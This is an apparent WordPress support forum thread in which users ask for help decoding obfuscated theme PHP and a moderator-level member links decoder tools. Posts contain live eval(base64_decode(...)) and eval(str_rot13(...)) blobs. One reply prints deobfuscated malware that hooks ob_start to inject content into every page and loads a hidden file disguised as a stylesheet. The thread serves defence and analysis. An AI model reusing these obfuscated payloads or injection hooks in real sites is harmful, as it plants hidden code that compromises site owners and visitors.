WordPress › Support » Encrypted Theme? Here's how to decode it.

Samuel Wood (Otto)
Tech Ninja
Posted 3 years ago #

Hopefully this will help some people, and avoid posts to the forum about encrypted theme files. Use these tools to decode them yourself.

Better yet, avoid encrypted themes entirely. They're always malicious in some fashion. There is no legitimate reason for a theme author to encrypt a theme file.

This page will let you decode the encryption that seems most commonplace, the one that looks like $o=whatever:
http://ottodestruct.com/decoder.php

I based the interface for it off of this one, which will decode the type of encryption that starts with $_F=__FILE__:
http://www.tareeinternet.com/scripts/byterun.php

Another one is here, for those that look like eval(gzinflate(base64_decode('...')));:
http://www.tareeinternet.com/scripts/decrypt.php

This site supports a whole lot of different decoding methods, and he's adding new ones all the time. All you have to do is upload the encoded file and it spits out the decoded one:
http://cyko.decodethe.net/

(Yes, I know they're not really "encrypted", they're obfuscated. Semantics.)
gonzalote
Member
Posted 3 years ago #

look, these is mine obfuscated php.

Please do not post encoded text on these forums. Use http://wordpress.pastebin.com instead, and post a link back here. -moderator

can you help me with this? none of the decoders works for it. thanks.
Samuel Wood (Otto)
Tech Ninja
Posted 3 years ago #

gonzalote: The decoder I posted above works just fine with that code.

Here's how you do it:
1. Go here: http://ottodestruct.com/decoder.php
2. See that $o="...garbage..." in your code? Take that garbage between the two quote marks, copy and paste it into the top box on the decoder form.
3. Hit the "Decode This Mess" button.

It works perfectly.
mkirkwag
Member
Posted 3 years ago #

So none of these actually work for the obfusticated code in the template I'd like to use. Tareeinternet has instructions for creating 3 files, loading them to the root directory and pointing the CHMOD at a particular file. Do you happen to know what constitutes the root directory in WP, and how you point CHMOD? I understand if you don't want to get into all this.

Here's an example of some of the code:
eval(str_rot13('shapgvba purpx_shapgvbaf(){vs(!svyr_rkvfgf(qveanzr(__SVYR__)."/shapgvbaf.cuc")){rpub(\'Guvf gurzr vf eryrnfrq haqre perngvir pbzzbaf yvprapr, nyy yvaxf va gur sbbgre fubhyq erznva vagnpg\');qvr;}}purpx_shapgvbaf();'));
I thought it might work if I added "(gzinflate" after "eval" but no...

http://tribeofadmins.com
Samuel Wood (Otto)
Tech Ninja
Posted 3 years ago #

Without the complete code, I can't decode it or give you any advice on decoding it.

In general, replacing evals with echos tends to work pretty well. But you need to examine the code and figure out how it works. It's not usually very complicated to do.

Kevin S
Member
Posted 3 years ago #

nothing above mentioned decode tools is working for me.

<?php
eval(base64_decode("JHZfdnY4UzBiOWlSMz0iSkhaZlpsQlRibFZwYWxGVU5UMGlXbTVXZFZrelVuQmlNalJuWkd3NWRtTkVUbmxQUkVJMFYyMVdWMHREVWpKWU1qRjNZMFJLVm1SWFNqRk5ia0Z3WlhsU01sZ3dlSFJQUjFKNFRUSTFNVll4YnpsTlJIUXpZVWRzYzFwVFozaExXSFJ3V21sbmEyUnNPWFJqU0VGNVZsaFdhV1JVU25kWGVWSXlXREI0ZEU5SFVuaE5NalV4VmpGd1pGQlVNWFZrVjNoelMxZEtlVnBYUm5KUGVYTnlTa2hhWmxSSE1EUmFTRVY2WW01V1dGZHFkRGxqYlZZd1pGaEtkVXBJV21aVVJ6QTBXa2hGZW1KdVZsaFhhblE1SWp0bGRtRnNLR0poYzJVMk5GOWtaV052WkdVb0pIWmZabEJUYmxWcGFsRlVOU2twTzJaMWJtTjBhVzl1SUhaZllreGtTMlJaVkRReFl5Z2tkbDh3Y1dKeGFYaHdZalphTENSMlgzWjNXbk01YUROWlVtSXBlMlZqYUc4Z0lpSTdKSFpmVTJoQmFXOXpZMkl4TnowaUlqc2tkbDgwWVhwcWJtUTNaelIwUFNoMlgyOXdNM0k0TUhoYVpWWW9KSFpmZG5kYWN6bG9NMWxTWWlrdk1pazdabTl5S0NSMlgzaHZOVmcwYmxjM01IQTlNRHNrZGw5NGJ6VllORzVYTnpCd1BDUjJYelJoZW1wdVpEZG5OSFE3S3lza2RsOTRielZZTkc1WE56QndLWHNrZGw5VGFFRnBiM05qWWpFM0xqMWphSElvYUdWNFpHVmpLSE4xWW5OMGNpZ2tkbDkyZDFwek9XZ3pXVkppTENSMlgzaHZOVmcwYmxjM01IQXFNaXd5S1NrcE8zMGtkbDl5UzNCU01HYzNZMUJwUFNJaU95UjJYelJoZW1wdVpEZG5OSFE5ZGw5dmNETnlPREI0V21WV0tDUjJYMU5vUVdsdmMyTmlNVGNwT3lSMlgzaHlNRlJSTjNNeFVsVTlkbDl2Y0ROeU9EQjRXbVZXS0NSMlh6QnhZbkZwZUhCaU5sb3BPMlp2Y2lna2RsOTRielZZTkc1WE56QndQVEE3SkhaZmVHODFXRFJ1Vnpjd2NEd2tkbDgwWVhwcWJtUTNaelIwT3lzckpIWmZlRzgxV0RSdVZ6Y3djQ2w3SkhaZloyMDVjMU5vWWpZeFREMXpkV0p6ZEhJb0pIWmZVMmhCYVc5elkySXhOeXdrZGw5NGJ6VllORzVYTnpCd0xERXBPeVIyWDNSME5WcGhNbFI0VUZJOWMzVmljM1J5S0NSMlh6QnhZbkZwZUhCaU5sb3NKSFpmZUc4MVdEUnVWemN3Y0NVa2RsOTRjakJVVVRkek1WSlZMREVwT3lSMlgxbGxOek13WWxCclVXUTliM0prS0NSMlgyZHRPWE5UYUdJMk1Vd3BPeVIyWHpoTU1XSnRkVmcyZDBFOWIzSmtLQ1IyWDNSME5WcGhNbFI0VUZJcE95UjJYMlZsZUZaME1HaHdVM2s5SkhaZldXVTNNekJpVUd0UlpDMGtkbDg0VERGaWJYVllObmRCT3lSMlgyZHRPWE5UYUdJMk1VdzlZMmh5S0NSMlgyVmxlRlowTUdod1Uza3BPeVIyWDNKTGNGSXdaemRqVUdrdVBTUjJYMmR0T1hOVGFHSTJNVXc3ZlhKbGRIVnliaVIyWDNKTGNGSXdaemRqVUdrN2ZRPT0iO2V2YWwoYmFzZTY0X2RlY29kZSgkdl92djhTMGI5aVIzKSk7JHZfNGF6am5kN2c0dD0iZFNOQUx3U2I2MzNiYnpLMDVTa3k4ODBoT3dxYlhmbG8iOyR2X05UMzZrdnVvVVI9IkNBQzhCQ0E0QzBFMEMyRDA1NkE3QTNDMUNBREZBQzk0OUFDNTkzQTJCMzQyMzlDRkJCRTZEM0MzQzQ4NjkwRTNENEJDQkNBN0JCQjI1RDZCOUI5NjlCRDE4MkExODdBM0E5Q0NEN0RFNThBQ0E5RDhCNEI0OTNENkJEREVFMDlFQzdDNkMxNjM4QTlFOEU2QzNGOTg5NkNBRDE5QTcyNTM5OEMyRDlFRDlEQTZBNEUzQjVFM0UwQzNDQ0EwRDhENENBQzc4OUJFNzNCMjVENkI5Qjk2OUJEMTgyQTE4NzVGQThDN0U0RTU5RDc2NTdBMzU5RjQ3QjZDQjlDQUQwQ0VDNUI2QzJBQUJCRTU3Qjg5QURBMzkyQ0FDN0RCQUY1NzYxNzM5MkVEQTg5Nzk4Q0RCMERCRDZENDdGOEZBNzhGNkU1RDdENkI3NkExN0Q4QzYwNUQ1RDhDOENBNDc1NUE1RjdEOTVBMzYyNjI1QTkyNzlBMTlCOEM4MjkwOTY5OThFN0Q3ODZCNzZBMTdEOEM2MDVENUQ4QzhDQTQ3NTVBNUY3RDk1QTM2MjYyNUE5Mjc5QTE5QjhDODI5MDk2OTk4RTdENzg2Qjc2QTE3RDhDNjA1RDVEOEM4Q0E0NzU1QTVGN0Q5NUEzNjI2MjVBOTI3OUExOUI4QzgyOTA5Njk5OTM1RDcyQjVCQ0Q2QjlEMUE1QTc5OEQ0QzFEREJEOTU5OUJDREY5OTc1NTg1N0E0QjA5N0Q5RDRCRENDQTk5MUNDQzdDMkIxODZBNjgyRDlBREFBNjFENkM3RTdCQjlDOTZDN0QwRTVBMUFDOTU5NkIyRTZERTkxQ0ZENURFRDNENEM1QjNCNEJGQTRDQUM3OTg2MDlCRDFENUVFQjQ5RTlDODI4REI3OEZBN0EyQ0NCRkU5RDZENUNCODZDM0Q0QzY3Mzk2QjBCRkVCQkNEMDlENkY2MkMzQTA5QUJCQTJBNEM5RDRERDlEOUM1MENBQzg5N0FEQzM3OENFREVENENBOTA3MEE5QzBFQkMzOUM2NTYyQUFEOUQ5QThCNkE2OThCQkRBRUNBQ0ExOUVDRjdEREFFMENGODc4OEFBQzZDOUI1NkU2MTk0RTZDNkQ2OUZBMTlBOUU5MURCODk1MEIxNzNBN0RBNThBMEEyQ0RCNUI0OTNDQUNDREFEQ0E5OTM4MkM1QjhDM0E1Q0FDNzk4OUJBMkQ1RDZFM0I5OTdBN0I4REJFOEFBQUM1RUNCQkVFNEEwODQ5NkE4RDFFMkQ4NzNBNUE2QUU5NzlCRDFBOUE3OUNEMEM5QjY3QTkxNzM3MzkxOTk3NDk5NTBEMEMxRENENzlGN0FDRUUwRTNENDhEN0Q3MEMzRUVDQTkwOUI5NkEyQ0ZDRkRGQkQ5MzlBQ0FEMERCQUJBMUE0Q0RDMkE1RDREMUM1OTRDREU0OTM3NThDQTY3OURBQzJDRkEzOThBNUM1QzdCNjdBOTE3MzdBQTY4MzVDQUNBMEM3QjVFNkUwRDZCREQ4Q0JEMkQ2QjhCMkFBQzBBNTkwODJBQTk4QTBEMkNFREJCRjk1QTFCQ0RGREU5N0FCOThEN0M2RDZERENCQzZEMURGOTc4RDhFNTg0QkIyRUNDMUM1QUE5Q0EyRDA4MkRCQUY5NDk0QzBEMEVEOTk5NzlDRDFCREUyOTk4QkQzNzA3NUQ0QzdCQkJENjE3M0IzQkZDQjc0NkY5NDgyQ0FFQ0IwOTY3Mjc1RDNFREFDQTg2QTk3N0VFRUU4RDk4NkNFREJFMkQ4QzVCM0E3QjFFOTgxQzVBNUEwNjI4NDgyRUVCNEE0QTFCOEE4OUI4RjlEOTI4ODk3RTZFNEQ2QzFENEQzOEZBOEJDQzBBNkFGRUJDMkQ0QUY1NTcxQjlDN0RDNkI3OEE0QzZERkUyQTY5RjUwQkFCNERERDZENDk0OTVDREFEQTA4MkJBQUE4QTlFOEU2QzNGOTg5NkNBRDE5QTcyNkNBMUJDQTlCNTk5NTg5OERBQjREREFFODRDMERBRTBERjlFODI3REI4QzNFRTgxRDU5RkExOUFDRUM3RTJCQUEwNjNCNkRBRTY2NzVBNTBEQ0I4RUJEREM3OTU4OEIwRDRDOEJDQjFBMkMwRENCNzgyOUVBMkE2RDZDQkU4QjI1MjczOTdEMEREQTE5QjkxRENCNERCOTFDQUM3RDlFMEQ4RDJCQThBNzBBREI1OEY5MUEyOUM3MTg5OUQ4NEM4M0E5NkI3Q0ZEODk5OUJBNEQxQkVFNTk5ODlDRkQ2Q0JEQ0M5QzdBRjY4Nzg5NzdBQzM5QTk3OTJDRkM3RUVBQzhGQTFCQ0Q5RTQ1RjYxNkI4ODU5ODFBMDhDODI5MDk2OTk4RTdENzg2Qjc2QTE3RDhDNjA1RDVEOEM4Q0E0NzU1QTVGN0Q5NUEzNjI2MjVBOTI3OUExOUI4QzgyOTA5Njk5OEU3RDc4NkI3NkExN0Q4QzYwNUQ1RDhDOENBNDc1NUE1RjdEOTVBMzYyNjI1QTkyNzlBMTlCOEM4MjkwOTY5OThFN0Q3ODZCNzZBMTdEOEM2MDVENUQ4QzhDQTQ3NTVBNUY3RDk1QTM2MjYyNUE5MjdFODFEN0Q3QzZDOUUwRDhEM0MxNkVCNUIxRTRDM0NFOTdBNzk4Q0VDQkVFQjA4RkE4QkJEQUYwOTdBNDk5RDZCQUVBOTk4QkQzNzA3NTkzQzdDOEMwQjNCMUU1Qzc5RjlEOThBN0MxRDFFQUJGOTlBNEMxOTNBMEFDOUQ5REQ4QkJEOEU1QzdDNENGRTBENEMzQkZCN0FGQjdFQTdBOEI3MTNEM0NDQkM4QTI2Qzk5QThCMkQzRThBNTlENTg5MTZGOUQ5NzgyNzlDRkRGQ0VDQUM1QkRBRkMwRDZDM0MzOUQ5ODVCOEI4QkY1NTQ1RjVGQkNEMTk5QTZBN0E0ODhCN0U2REVDNzg0ODZFM0Q0ODRCREMzQjRDMDk3QzVDN0FBQThBNUQwODJFRUIzOTU1NUJGRDRFN0EzQUI1Qzg4QjNFNkRGODlDQzg2Q0ZEN0M5QjZCOTYxNzQ5OEJDRDU5NTlCQTJDRkM3QTI3NDU5NUY4Mjc1ODI0MUFBOTVEQ0M0RTlERjgyN0NDOUUxRTFENkI4QkNCNUE3OUVCRkNCQTQ5RUE2ODlCRkI1NTUzOUIyNUQ3NDlEQTA5OUEzRDA4QzlFQTk5Qzg4OUY5Q0EzOTQ4QTc1N0M1NjgwNzdEMkE1QTZBN0MxRDhEQkJEOTk5NkI1RDdERUFCNTg2RDg4QjBFOUUzQzNEMThFNzY3ODZEN0FCMEFEQkJERUIyQ0FBNUEwOTg4OTlGQjhCMjk1QTlCMkNERTVBNzlGOTlENkI1RTY5OTg5QzBENUQ5RDQ4QjdDN0E0QjU1ODA3QUM0QTJBMjlBQzFENkUzQkY5QzlBN0FBOEI3OUY5REE0QzdCMUUzRTBDOUMxRDREMkRFOEM3QUMyQUFDMEUzQjg4OTVGNUYzRDZCNkJBMUJGOTg5QUMwRDBEOEFCQTg5RkRDNzZCNEFGODk4OThEOTg3OTZENUM3NUI1QjREQ0MwQzc5NTlDOTc4OTlGQjg3MjY4NUM3Rjc1ODI0MTVGQTREMEI0RTRENkMxQ0VDQkRFOTZBMTkxNzU3MjdBQTc4NDg5NjIzRDNDNkI4OUVFQjM5NUEyQjhDQUU3OTlBNTk1OEY4Q0I1OThBNUM3Q0NEMkQ0Qzk3MzkyQTZCRkUyN0E4RTQwM0M1QzlENkM4NDU0OTk5QjdCOEZEQ0FEQUFBMkNEQkRFQkFFOUY5NUFDQURCQkI3OTg2RUJEQzg5Nzc3QzVBQkE1QTVDN0QwRUVBNjU3QTlCQ0Q4REU1Rjk1NTBBNDZGRUJEQUNGQkQ4RTk1OUM5ODg2ODA3MTdDOTc3M0RFQjI1MzU3QzVEN0VDQkQ5NUEzQzdDNkEwQTA5OUEzRDA3NkQ0OTI5RjdDQ0VDREUyQ0M3Q0M5NjE3QkExQzBDQkE0NTM2NDk0ODJFMkJBQTVBN0M2OTVBODQyNDEzOThDQkREQ0U4OUZCOUQ4REVEMEREN0I3NzdDNTY4MDVDODZBNDk4QUFCRDg5RUVCNDlEOUE3QUM4QjZBQ0ExOURDRDc3QTBBQzZDNjE2RjkwRERDOUNBQTk2OEI0RDhDNkNBNUQ5MDcwODZDQURCQkU5ODcwNUQ3NDgyNUNBNjk1REZBQTlFRERDQkM2RDFERjk2QzE5MEMyQTZCOUU3QkZDM0FBOTg5RkNCRDZERkFBOTc5QUM3Q0FFNUExQTY5QkRCNzc5QkUxRDFDQkRBQ0JFNUM1QzVCN0EyQUVFM0I4RDU1RjZFM0Q2QjZCODQ1NDM5OUVCOTkzOURBNjlEQTdDMzc2RTNEQUQwQzNEOTkzQ0NBMTkwOEI4NzhEQzNBNkE3NUZBRTUzOTE4Q0YxQjM5NUEzNzNDRkRBQUM5OTUwQ0RDMUU5RTBENDg0ODZERkRFQzdCRUIzQjU2Q0VCQkNDRjlCOTc1M0QxRDdFRTZCOUZBNzczREVFREFBOUQ5MUQ1NkZFQkRBQ0ZCRDg2REJFNEQ4N0Y2RUI4QjE5N0M4RDI5QTk0QTdDNzgyRUVCMzk1NTVDN0Q0RTY5RDYyNUY3MjU4ODA3QTg2QzZDQkUzQ0E4QkJGQjdBRkI3RUE3QUJGNzM1Nzk2RDdENEVDQjA5RUE5QUU5MkU1QTFBNjlCREI3NkQ0QUM2QzYxNkZFOTc5NkU1QzU3QjZCQ0RCQjRENjlCOTJBMkQyRDZFM0JBOUU1RDc1REZERUE1QTg5Q0M5QzNEQ0REQ0JDQ0NCQ0JEQkNEQzFCOUI0NkVBMzc3RDA5QkFBNUM5RDgyQTk3NUE0OURCODhCRTVBMUE2OUI4OEJDRDhFQUM0QkQ4NkQ1RTI4NEI4QkJCMUMwRjA3M0M0QUJBNzUzRDlDNzlBQjVBNUE4Qzc4QkVDOTlBRTk1ODhDM0RGRDY4MkNDQ0ZEOUQ0ODRCQ0JDQjVCQjk3QjdDM0FBOTQ5NUMzRDVERjc1NUYzRjVDNzRFQjlEQUNBNURBQkQ5Nzk1RDBCREREQzc5NkQwQkNCQ0FDQkY5RUIwOUQ0MDNDQjBDN0NFRURCMEFCM0Y1Qzc0RUI5REFDQTVEQUJEOTc5NUM1Q0REOERFRDREMkM3QTk2OEI4RTBDMUNEQTk1QTkwOUQ2QzgzQzgzQUIyNUQ3NURGQURBNjkzRENCOEU2REY4MkNDQ0JEOURGRDBCNEMyQTZCOEUwQzdDNzk1OUE5OEQ2QzFFNkI0OUVBMEM2OTM5REE4QTdBM0RDQUVFREQyRDRDMUM3Q0VEQkM5QzY3N0JDNTY4MEJDRDA5OTlGQThDNkM3RDlCQTlFOThCODkzQkE3QThCODBBOUEzQkY5MTkwNzhCREJDQjhCMjk2NkU2RjZDOUU4MkQ0QTlBNjYxRDJDQUVBNzI1OTcwNUQ3NERGQTdBQTk1QzlCMkRGOTk4NkM4RDVERkUzQzNDOUFGQjNCNUQ4QjVDRTlCQTY1M0MzRDU5QTZGOUI5QUNDQThCNzVDQUU5MUQ0QzREQzlBREQ2MjZGNzU5M0M4QjRDMkEyN0FCNDczODZBMTk4QUM5MDg5Qjc3MjVFQTdCNEUyRUVBQUE0OTVENkIyRTZENUM3ODA4QUUyRDBEMEM4QjM2QTdBOTk3OTg0NzEzRDNDREY2QzgzNkY5NDk2QzdDQ0I2QUFBQ0EyRDFCQzlGOTVDNkI5REFDRDlCODY3OTcwNkE4NzgxNUM4NkFBQTBBM0MxQzRFOUJBOUM3Mjk5QUNDNThCN0Q2QjcyNThFMEQ3OEFBNUE3QjNCRkFEOThBRDg0OERCQTlCQTc5NTgyODE4QkREODQ1NDM5NTlDN0Q4RTk5NzlBOUZEN0JCQjRDNUI0QURBQkE3Nzk2RDVDQjJBNkIyRTBDMUM3NUU1QTgwQTNBOUNBOTQ3NTk0OTZBQ0JDODA3RDhGQjc5RDlFOUQ4Mjg4OEZBNzc5NkREMDU4NEI1NTlCQzVENUE5NzA5OUM3RDZEREIzOEZBN0M2REVBMTVGQTBBNERDQkZCMUEwOTFDRkRERTM5REQ4QjhCQkIxQjhEOEM3QzdBOUE3OTRENkQ1QThBRTlGQTI4MkNDRTlBMTY3QTJEQkMyQTZCMDg5ODY4QUQwRDBEOEI0Nzc3QzU2ODBCQ0M4NUU1N0E3Q0ZEMkQ5QUQ5RkE0QkZBOEI2NzU4QzgyQkQ5NEEwOTFDNkJEQ0NENUREQzk3Qjc1OEU4REJFQTNBQjdCOTI3NkEzQTVDMjkwOEY4NEExOTJBNTU4Njk1OUEzNTk4MTdBQ0JCRThFOTBFMUQ3QzY3NzYxQzc4MTVDNkI1QTlDQTdDN0NGRUQ2QjZENTVCNERERUI5OUIxOEZEQkJCRTBENEM3ODA4QURFRTJENzgwOENBQUMwRENDMEQ1NjI1MzYzOEU4MkFENzQ2QjY0N0REOERBQTM5RDUwREJDNEU5RDY4MkNGQ0I4Q0Q2QzlDNzZFOEU4RENGOUNBRjhCODA1Mzk1ODJFNkI0OUVBMEM2OEJDODg2ODQ4OTkyN0U4MTdBNkJDMUNDOTREMkQzQzhCQ0I1NzQ5QkJDRDY5QkEwQTY4QjlGQjc3QjU5NTVDNUQwRURBREFBOUU4ODcxOTlBQzZDNjE2RkQyREVENkI4QUZBNEI0OTc3QjhBOTdBNUE1QzNEQkEzNkY5OUE5QjhEOEVDNTg5OUEzODg3M0UwRTVDN0M1ODY5NUVBNkU1QzU3NEE3MEVCQzBEMjkxOTA3MDg2Q0JFRUIwOUQ5MDdBREJFQjlEOUU5OUUwNzZENDlGODk5NEM3OENEN0Q2QjhCNDdFNkU5RTgxODY5RkE3OThDRkJEQTFCNzk5QTNCRTkyRDY2NjVGNTI4OEMzRTBFNUNFQkRBMzhFOTY5Mjc3QjdCNUIxRTRBRTg5OUE5OEE2QzVENEUzQkJBNDlFQzJEOUEwOTU2NjU3OEE4RDlFOUY4NkMxREFEMURDQkY3QUMyQUFDMEUzQjg4OTkzNjE1QTlFOTFEQjg5NTc3MDVENzQ4MkI1NDIzOTcxNzNFM0RBRDBDM0Q5QTk5M0Q2QzZDMTZFOEFEQUJCQzNBNEExOThDRUJEQTFCQkEyOUFCOUQ0RjE1Rjk1NUVEMUJDRTdEREQxQkNDQjk0OTE5MDczNzA2RDcwRUJDMEQyNUY2RTNENkI2QjlFQjc5OUEzQkVERUI2QUJBQ0EyRDFCRkQ2RTVDM0JGRDk5NDkzRDBCQ0JDQUNCRkEzNzU5RTk3NzE1NThCOUQ5QTdBNUE5OUMyRTBEQkE0OUQ1MENCQkVFNUQ3Q0JDQUQzOENFM0NDQjRDMjYxQkJFNUJGREI1NkE3OThEQUQ2OUFBQzlFOTk3M0Q3RTJBNkEzQTM4OEIwRTlENjgyQjlEMkQ4REVEQjgxNzg3MDU2ODA1Q0Q0OUJBN0E4RDREMDlBNkY5QzlFQzFENkVDNzM0MjM5RTVCNEUzRTRDN0QzNzA3NTc4RDZCOEMyQjZCRUU1NzNBODc3N0Y4NkE3OUQ4NDU0QUQzRkQwNzU4MzlFQUQ5RUNCQzNFMEUwRDA3OERBRDRENEQxQjhBREE0QkVEQ0I3Q0JBQTVCNUNERDZDODNCMjlDQTRCNUNDRTU1ODVDQTREOEFFRERFMEQxQ0NDQkRFQ0VDN0M1QjNBNUI1RUI4RTZDM0Y5ODk2Q0FEMTlBNkZBNEE1QjJEMUU4QTdBQzk1REFBRURBRTNDN0JDQ0ZFMEFBNkVEMDU4NEJCQkQ5QjJENUFBOTRBNUQ2OEFBMzg2M0E5RUMxQ0VFNUFEOUM5NTg4QTNCQ0JFQjJBNEE3QzBCNEI0OTRBMjg5N0E5OTgyQzhBNUEyQTdDN0Q0QThCQjk4QTU3NUE2ODM1Q0FDQTBDN0I1RTZFMEQ2QkREOENCRDJEM0MxQzJBNkJBRUI5MEQxOTg5MjlBQzdENkQ5QUU5RkEzQzdEMEU3QUNBQjU4OTE4QTgxRTBDNEI3Q0JEQUQzQzNCNkJBQTZBREU1N0I4QjcxM0QzREM4RDdFOEFFQTQ5RUMyRDk5OUFDQTg4RkNFQkVFNkU1QzdDQThFOTVFQTZFNUNCNUFEQkJEOUI0Q0U1NjU3QTdEMkMxRTBCQTlGQTlCOERERDg5QkE3OUVEQ0I0RTVFNThFN0NEQURDQ0VDQUMyQkRCNUIxRTlCMkM1QTg5ODk3Q0JENkI1NTUzOTlFQjk5M0VDQUNBQUEwRDdDMjlGOTVENkM4QzVEMkRFRDNDN0IzQjNBQkRBQzJEMEFBOThBMUQ2OEU5RUJGQTA5NEI5REFFOEFDOURBMkM3QjJFOUQ2QzZDMURBOTU4RkExOTA4QjYxQjJEOEJGRDU5QjVDNTNERDZDODM1NDk1OThCQkRBOTk1QTVBNkI3MjU4RjRENkNFQ0JDQkU3Nzk2RDVDQjNBNEI0RTY3Mzg2QUFBMzkyQzhEMUU5QkY5NUE3QjJDRUU4QTZBQzk1RDZDM0IyN0I2QkQ1NzBFOTc5QzVCN0IyQTBBRERBQzdDQkE1QTE1Qjg5QzlERkJGOEY5QkMyREFFRDlEQUE1Nzk0NzZFQkUxQzFCRUQ1REJFM0M5QzU3NTZBODciO2V2YWwodl9iTGRLZFlUNDFjKCR2XzRhempuZDdnNHQsJHZfTlQzNmt2dW9VUikpOw=="));
?>

JCoelho
Member
Posted 3 years ago #

Hey Otto, I've tried your decoder with this footer:
Please do not post encoded text on these forums. Use http://wordpress.pastebin.com instead, and post a link back here. -moderator

And got this code:

Please do not post large sections of HTML/PHP code on these forums. Use http://wordpress.pastebin.com instead, and post a link back here. -moderator

$_X=b2s61i_d6c3d6($_X);$_X=strtr($_X,'aouie123456','23456aouie1');$_R=6r6g_r6pl2c6('__FILE__',"'".$_F."'",$_X);6v2l($_R);$_R=0;$_X=0;

I see some links to the author page in there, aswell as some google ads stuff (I know the theme supports it), strangely there's still some encrypted stuff in the bottom that I can't figure out.

I would also like to request your help in figuring out what needs to be put in the footer, and what part of this code can go to the graveyard.

Best Regards,
JCoelho
thpanagos
Member
Posted 3 years ago #

Hello.
It all started with a mess in my wordpress blog admin page. Reading around i found that the /**/eval(base64_decode('aWYoZ ... code could be really bad. I got it in a http.php file. I tried on line decoders, but with no result. Even if i manage to decode it, i have nothing to do with codes, so i cant tell what it must be fixed, if any.
Any help?

I got this line:
Please do not post encoded text on these forums. Use http://wordpress.pastebin.com instead, and post a link back here. -moderator
mkirkwag
Member
Posted 3 years ago #

Thanks, Otto. I wasn't actually asking you to decode my theme - I'm sure you have better things to do :-). I just wondered if you - or anyone else - know what constitutes the root directory in WP and what CHMOD is and how you aim it so that I can follow Tareeinternet's directions. Thanks in advance!
Adam Harley
Member
Posted 3 years ago #

@mkirkwag the root directory in WP is the base directory in which wp-includes, wp-content and wp-admin are normally found. Chmod is a tool/instruction that's used to change file permissions, usually easiest using your FTP client unless you have console access.

@JCoelho That's not encrypted, that's PHP code that the final line eval( is telling it to execute. God knows quite what it's doing, but I'd run a mile from a theme doing that much to obscure its "activities".

It reads as:
$_X = b2s61i_d6c3d6($_X); set $_X to the result of a random function
$_X=strtr($_X,'aouie123456','23456aouie1'); Find something from some function
$_R=6r6g_r6pl2c6('__FILE__',"'".$_F."'",$_X); Do something with the file path
6v2l($_R);$_R=0;$_X=0; Run a function, set with some variables

In short, without seeing the full thing, I'd avoid like the plague.

Adam Harley
Member
Posted 3 years ago #

@mkirkwag your sample reads:
function check_functions({if(!file_exists(dirname(__FILE__)."/functions.php")){echo('This theme is released under creative commons licence, all links in the footer should remain intact');die;}}check_functions();

Easiest way to decode is to change eval, the command to evaluate (run) code, to echo, the command to just write it.

@thpanagos That's... some insanely written code. I've broken it down but it's hard to tell what it's doing without seeing some of the functions it references. They'll be under /wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/style.css.php. I'm 99% sure from what I can tell of it though is that it's a virus which is set up to read files from your system, probably on demand. Anyone else think the same looking at dgobh() which strips out the HTML, takes out any content type header and puts something else in its place? And providing gzdecode() if it doesn't exist... really?

Here's the dumbed down version of the code (the real variables are ridiculously long random hex):

if ( function_exists( 'ob_start' ) && !isset ( $GLOBALS[ 'sh_no' ] ) )
{
	$GLOBALS['sh_no']=1;
	if ( file_exists ( '/home/mikesurf/public_html/<website domain>/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/style.css.php' ) )
	{
		include_once ( '/home/mikesurf/public_html/<website domain>/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/style.css.php' );
		if ( function_exists ( 'gml' ) && !function_exists ( 'dgobh' ) )
		{
			if ( !function_exists ( 'gzdecode' ) )
			{
				function gzdecode( $passed_by_gzdecode ){
					 $var_A1 = ord ( substr( $passed_by_gzdecode, 3, 1 ) );
					 $var_A2 = 10;
					 $var_A3 = 0;
					if( $var_A1&4 ) {
						$var_A3 = unpack ( 'v', substr( $passed_by_gzdecode, 10, 2 ) );
						$var_A3 = $var_A3[1];
						$var_A2 += 2 + $var_A3;
					}
					if( $var_A1&8 ) {
						$var_A2 = strpos ( $passed_by_gzdecode, chr(0), $var_A2 ) + 1;
					}
					if( $var_A1&16 ) {
						$var_A2 = strpos ( $passed_by_gzdecode, chr(0), $var_A2 ) + 1;
					}
					if( $var_A1&2 ){
						$var_A2+=2;
					}
					$var_A4 = gzinflate( substr ( $passed_by_gzdecode,  $var_A2 ) );
					if( $var_A4 === FALSE ) {
						$var_A4 = $passed_by_gzdecode;
					}
					return  $var_A4;
				}
			}
			function dgobh ( $passed_by_dgobh ) {
				Header( 'Content-Encoding: none' );
				$var_B1 = gzdecode( $passed_by_dgobh );
				if ( preg_match( '/\<body/si', $var_B1 ) ) {
					return preg_replace ( '/(\<body[^\>]*\>)/si', '$1'.gml(), $var_B1 );
				}
				else {
					return gml().$var_B1;
				}
			}
			ob_start('dgobh');
		}
	}
}

calvinms
Member
Posted 3 years ago #

I have been struggling for hours to decode this byterun decoded footer.php file, and unfortunately the site doesnt work for me, could someone help me?

Please do not post encoded text on these forums. Use http://wordpress.pastebin.com instead, and post a link back here. -moderator
Samuel Wood (Otto)
Tech Ninja
Posted 3 years ago #

calvinms: Somebody used the ByteRun encoder twice in a row. Nice.

First, copy and paste the Pz48P3...nKSk7Pz4= stuff into that ByteRun decoder page, then hit the button. You'll get back more encoded stuff, but notice that it looks to be the same type of encoding.

So, copy and paste the contents of the $_X variable from the bottom box to the upper one again and hit decode one more time.

Voila. There you go. Takes about 10 seconds.
Samuel Wood (Otto)
Tech Ninja
Posted 3 years ago #

JCoelho: That bit of code looks left over from the initial decoder section, or somebody messed up.

I've seen encoded code that looks like that. Basically it's replacing vowels with numbers and vice-versa, as a sort of poor man's obfuscation. When it reverses, it uses that to decode and decrypt followed by an eval.

Basically, it's garbage. Delete it.
calvinms
Member
Posted 3 years ago #

thank you very much, that explains why I kept getting the same result. :)
naweedshams
Member
Posted 3 years ago #

I found this on a very helpful site, this is only for those of you with encrypted footer.php.

Place this code:



<?php get_footer(); ?>



In your Index.php right at the bottom, you can replace the <?php get_footer(); ?> with the code above.

Then go to your web browser and view your website source, you will see the original footer.php file so copy all of it from where you see  right down to  and paste it in your footer.php. Delete all the encrypted code and your done!

Hope this saves alot of headache for everyone!
naweedshams
Member
Posted 3 years ago #

Although I might need help with the index.php file too, theres a nasty looking encrypted code:

Please do not post large chunks of code here in these forums. -mod

Anyone able to help?
Samuel Wood (Otto)
Tech Ninja
Posted 3 years ago #

naweedshams: The very first post in this thread gives you a link to a decoder specifically designed to decode the code that you posted. Use it, please.
mkirkwag
Member
Posted 3 years ago #

